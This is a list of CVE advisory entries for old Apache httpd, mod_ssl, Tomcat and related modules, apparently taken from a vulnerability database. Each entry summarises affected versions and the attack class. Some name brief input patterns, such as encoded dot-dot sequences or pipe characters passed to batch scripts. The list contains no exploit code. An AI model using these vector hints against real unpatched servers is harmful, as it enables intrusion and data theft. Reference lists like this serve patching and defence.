3420| [CVE-2004-1834] mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.
3421| [CVE-2004-1765] Off-by-one buffer overflow in ModSecurity (mod_security) 1.7.4 for Apache 2.x, when SecFilterScanPost is enabled, allows remote attackers to execute arbitrary code via crafted POST requests.
3422| [CVE-2004-1545] UploadFile.php in MoniWiki 1.0.9.2 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.hwp, which allows remote attackers to upload and execute arbitrary code.
3423| [CVE-2004-1438] The mod_authz_svn Apache module for Subversion 1.0.4-r1 and earlier allows remote authenticated users, with write access to the repository, to read unauthorized parts of the repository via the svn copy command.
3424| [CVE-2004-1405] MediaWiki 1.3.8 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
3425| [CVE-2004-1404] Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
3426| [CVE-2004-1387] The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.
3427| [CVE-2004-1084] Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles.
3428| [CVE-2004-1083] Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.
3429| [CVE-2004-1082] mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.
3430| [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
3431| [CVE-2004-0940] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
3432| [CVE-2004-0885] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
3433| [CVE-2004-0811] Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
3434| [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
3435| [CVE-2004-0786] The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.
3436| [CVE-2004-0751] The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).
3437| [CVE-2004-0748] mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.
3438| [CVE-2004-0747] Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.
3439| [CVE-2004-0700] Format string vulnerability in the mod_proxy hook functions function in ssl_engine_log.c in mod_ssl before 2.8.19 for Apache before 1.3.31 may allow remote attackers to execute arbitrary messages via format string specifiers in certain log messages for HTTPS that are handled by the ssl_log function.
3440| [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
3441| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
3442| [CVE-2004-0493] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
3443| [CVE-2004-0492] Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.
3444| [CVE-2004-0490] cPanel, when compiling Apache 1.3.29 and PHP with the mod_phpsuexec option, does not set the --enable-discard-path option, which causes php to use the SCRIPT_FILENAME variable to find and execute a script instead of the PATH_TRANSLATED variable, which allows local users to execute arbitrary PHP code as other users via a URL that references the attacker's script after the user's script, which executes the attacker's script with the user's privileges, a different vulnerability than CVE-2004-0529.
3445| [CVE-2004-0488] Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.
3446| [CVE-2004-0263] PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.
3447| [CVE-2004-0174] Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."
3448| [CVE-2004-0173] Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.
3449| [CVE-2004-0113] Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.
3450| [CVE-2004-0009] Apache-SSL 1.3.28+1.52 and earlier, with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth enabled, allows remote attackers to forge a client certificate by using basic authentication with the "one-line DN" of the target user.
3451| [CVE-2003-1581] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
3452| [CVE-2003-1580] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
3453| [CVE-2003-1573] The PointBase 4.6 database component in the J2EE 1.4 reference implementation (J2EE/RI) allows remote attackers to execute arbitrary programs, conduct a denial of service, and obtain sensitive information via a crafted SQL statement, related to "inadequate security settings and library bugs in sun.* and org.apache.* packages."
3454| [CVE-2003-1521] Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
3455| [CVE-2003-1516] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.
3456| [CVE-2003-1502] mod_throttle 3.0 allows local users with Apache privileges to access shared memory that points to a file that is writable by the apache user, which could allow local users to gain privileges.
3457| [CVE-2003-1418] Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child process IDs (PID).
3458| [CVE-2003-1307] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."
3459| [CVE-2003-1172] Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.
3460| [CVE-2003-1171] Heap-based buffer overflow in the sec_filter_out function in mod_security 1.7RC1 through 1.7.1 in Apache 2 allows remote attackers to execute arbitrary code via a server side script that sends a large amount of data.
3461| [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
| [CVE-2003-1054] mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference.
| [CVE-2003-0993] mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.
| [CVE-2003-0987] mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.
| [CVE-2003-0866] The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.
| [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.
| [CVE-2003-0843] Format string vulnerability in mod_gzip_printf for mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode and using the Apache log, allows remote attackers to execute arbitrary code via format string characters in an HTTP GET request with an "Accept-Encoding: gzip" header.
| [CVE-2003-0789] mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.
| [CVE-2003-0771] Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
| [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
| [CVE-2003-0542] Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.
| [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.
| [CVE-2003-0254] Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.
| [CVE-2003-0253] The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.
| [CVE-2003-0249] ** DISPUTED ** PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report."
| [CVE-2003-0245] Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.
| [CVE-2003-0192] Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.
| [CVE-2003-0189] The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.
| [CVE-2003-0134] Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
| [CVE-2003-0132] A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
| [CVE-2003-0083] Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.
| [CVE-2003-0020] Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.
| [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.
| [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.
| [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
| [CVE-2002-2309] php.exe in PHP 3.0 through 4.2.2, when running on Apache, does not terminate properly, which allows remote attackers to cause a denial of service via a direct request without arguments.
| [CVE-2002-2272] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.
| [CVE-2002-2103] Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.
| [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.
| [CVE-2002-2012] Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
| [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
| [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
| [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
| [CVE-2002-2006] The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
| [CVE-2002-1895] The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.
| [CVE-2002-1850] mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
| [CVE-2002-1793] HTTP Server mod_ssl module running on HP-UX 11.04 with Virtualvault OS (VVOS) 4.5 through 4.6 closes the connection when the Apache server times out during an SSL request, which may allow attackers to cause a denial of service.
| [CVE-2002-1658] Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
| [CVE-2002-1635] The Apache configuration file (httpd.conf) in Oracle 9i Application Server (9iAS) uses a Location alias for /perl directory instead of a ScriptAlias, which allows remote attackers to read the source code of arbitrary CGI files via a URL containing the /perl directory instead of /cgi-bin.
| [CVE-2002-1593] mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.
| [CVE-2002-1592] The ap_log_rerror function in Apache 2.0 through 2.035, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.
| [CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.
| [CVE-2002-1394] Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.
| [CVE-2002-1233] A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.
| [CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840.
| [CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.
| [CVE-2002-1148] The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.
| [CVE-2002-0935] Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.
| [CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.
| [CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.
| [CVE-2002-0839] The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.
| [CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.
| [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.
| [CVE-2002-0658] OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.
| [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.
| [CVE-2002-0653] Off-by-one buffer overflow in the ssl_compat_directive function, as called by the rewrite_command hook for mod_ssl Apache module 2.8.9 and earlier, allows local users to execute arbitrary code as the Apache server user via .htaccess files with long entries.
| [CVE-2002-0513] The PHP administration script in popper_mod 1.2.1 and earlier relies on Apache .htaccess authentication, which allows remote attackers to gain privileges if the script is not appropriately configured by the administrator.
| [CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.
| [CVE-2002-0392] Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.
| [CVE-2002-0259] InstantServers MiniPortal 1.1.5 and earlier stores sensitive login and account data in plaintext in (1) .pwd files in the miniportal/apache directory, or (2) mplog.txt, which could allow local users to gain privileges.
| [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.
| [CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.
| [CVE-2002-0082] The dbm and shm session cache code in mod_ssl before 2.8.7-1.3.23, and Apache-SSL before 1.3.22+1.46, does not properly initialize memory using the i2d_SSL_SESSION function, which allows remote attackers to use a buffer overflow to execute arbitrary code via a large client certificate that is signed by a trusted Certificate Authority (CA), which produces a large serialized session.
| [CVE-2002-0061] Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.
| [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and does not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
| [CVE-2001-1534] mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.
| [CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL.
| [CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.
| [CVE-2001-1385] The Apache module for PHP 4.0.0 through PHP 4.0.4, when disabled with the 'engine = off' option for a virtual host, may disable PHP for other virtual hosts, which could cause Apache to serve the source code of PHP scripts.
| [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.
| [CVE-2001-1217] Directory traversal vulnerability in PL/SQL Apache module in Oracle Oracle 9i Application Server allows remote attackers to access sensitive information via a double encoded URL with .. (dot dot) sequences.
| [CVE-2001-1216] Buffer overflow in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to execute arbitrary code via a long request for a help page.
| [CVE-2001-1072] Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.
| [CVE-2001-1013] Apache on Red Hat Linux with with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
| [CVE-2001-0925] The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.
| [CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.
| [CVE-2001-0766] Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.
| [CVE-2001-0731] Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.
| [CVE-2001-0730] split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.
| [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.
| [CVE-2001-0590] Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).
| [CVE-2001-0131] htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allows local users to overwrite arbitrary files via a symlink attack.
| [CVE-2001-0108] PHP Apache module 4.0.4 and earlier allows remote attackers to bypass .htaccess access restrictions via a malformed HTTP request on an unrestricted page that causes PHP to use those access controls on the next page that is requested.
| [CVE-2001-0042] PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.
| [CVE-2000-1247] The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.
| [CVE-2000-1210] Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.
| [CVE-2000-1206] Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.
| [CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, discloser on 20070724, is one such variant.
| [CVE-2000-1204] Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.
| [CVE-2000-1168] IBM HTTP Server 1.3.6 (based on Apache) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
| [CVE-2000-1016] The default configuration of Apache (httpd.conf) on SuSE 6.4 includes an alias for the /usr/doc directory, which allows remote attackers to read package documentation and obtain system configuration information via an HTTP request for the /doc/packages URL.
| [CVE-2000-0913] mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.
| [CVE-2000-0883] The default configuration of mod_perl for Apache as installed on Mandrake Linux 6.1 through 7.1 sets the /perl/ directory to be browseable, which allows remote attackers to list the contents of that directory.
| [CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary diretories via the PROPFIND HTTP request method.
| [CVE-2000-0868] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.
| [CVE-2000-0791] Trustix installs the httpsd program for Apache-SSL with world-writeable permissions, which allows local users to replace it with a Trojan horse.
| [CVE-2000-0760] The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.
| [CVE-2000-0759] Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.
| [CVE-2000-0628] The source.asp example script in the Apache ASP module Apache::ASP 1.93 and earlier allows remote attackers to modify files.
| [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.
| [CVE-1999-1412] A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.
| [CVE-1999-1293] mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.
| [CVE-1999-1237] Multiple buffer overflows in smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allows remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.
| [CVE-1999-1199] Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.
| [CVE-1999-1053] guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".
| [CVE-1999-0926] Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.
| [CVE-1999-0678] A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.
| [CVE-1999-0448] IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.
| [CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.
